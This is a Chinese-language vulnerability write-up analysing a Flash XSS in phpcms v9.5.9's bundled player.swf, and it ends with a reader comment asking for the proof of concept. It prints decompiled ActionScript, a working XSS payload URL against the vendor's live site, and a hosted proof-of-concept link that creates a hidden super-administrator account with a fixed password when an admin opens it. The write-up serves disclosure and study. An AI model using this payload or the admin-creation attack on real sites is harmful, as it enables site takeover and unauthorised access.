作者:phithon
团队:安全盒子团队 www.secbox.cn
博客:https://www.leavesongs.com
/statics/js/ckeditor/plugins/flashplayer/player/player.swf,这是phpcms在新版本v9.5.9中加入一个flash文件。
反编译:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | public class myPlayer extends MovieClip { public function myPlayer(){ var stream:* = undefined; var streamname:* = undefined; var live:* = undefined; var subscribe:* = undefined; var video:* = undefined; var thumbnail:* = undefined; var autoplay:* = undefined; var fullscreen:* = undefined; var skin:* = undefined; var openLink:* = undefined; super(); openLink = function (_arg1:ContextMenuEvent):void{ navigateToURL(new URLRequest("http://gokercebeci.com/dev/f4player/?feature=player")); }; stage.scaleMode = StageScaleMode.NO_SCALE; stage.align = StageAlign.TOP_LEFT; stream = this.loaderInfo.parameters.stream; streamname = this.loaderInfo.parameters.streamname; live = (this.loaderInfo.parameters.live == 1); subscribe = (this.loaderInfo.parameters.subscribe == 1); video = this.loaderInfo.parameters.video; thumbnail = this.loaderInfo.parameters.thumbnail; var skinfile:* = this.loaderInfo.parameters.skin; autoplay = (this.loaderInfo.parameters.autoplay == 1); fullscreen = this.loaderInfo.parameters.fullscreen; var skinEvent:* = function (_arg1:Event):void{ skin = _arg1.currentTarget.content; stage.addChild(skin); ExternalInterface.call("console.log", "initializating ..."); ExternalInterface.call("stream", stream); var _local2:* = new Player(stream, streamname, live, subscribe); skin.initialization(_local2, stage.stageWidth, stage.stageHeight, video, ((thumbnail) ? thumbnail : null), autoplay, fullscreen); }; var sl:* = new Loader(); sl.contentLoaderInfo.addEventListener(Event.COMPLETE, skinEvent); sl.load(new URLRequest(((skinfile) ? skinfile : "skins/mySkin.swf"))); |
这几句比较重要:
stream = this.loaderInfo.parameters.stream;
var skinfile:* = this.loaderInfo.parameters.skin;
var skinEvent:* = function (_arg1:Event):void{..ExternalInterface.call("stream", stream);..}
sl.contentLoaderInfo.addEventListener(Event.COMPLETE, skinEvent);
sl.load(new URLRequest(((skinfile) ? skinfile : "skins/mySkin.swf")));
第一、二句,从this.loaderInfo.parameters参数中获得stream、skinfile。第三句定义了一个函数skinEvent
,其中调用了ExternalInterface.call,将stream作为第二个参数传入。第四句将skinEvent
作为事件Event.COMPLETE的回调。第五句,是执行load操作。
所以,整个过程是这样:
加载该swf,获得参数skinfile,并加载skinfile表示的文件,在加载完成后调用回调函数skinEvent。在skinEvent中又调用ExternalInterface.call执行javascript代码,其中第二个参数可控。
既然第二个参数可控,就能造成flash xss。
官网演示:
http://www.phpcms.cn/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\%22))}catch(e){alert(1)}//
flash xss是比其他XSS更好用的,因为无视浏览器auditor。
构造一个增加后台管理的POC:
http://mhz.pw/game/phpcms/frame.php?target=http://10.211.55.3/phpcms
target改成自己目标即可,目标网站管理员访问POC之后即可增加一个用户名phithon,密码33444433的超级管理员:
直接用上面的地址就可以吗?能否发个poc?多谢大牛!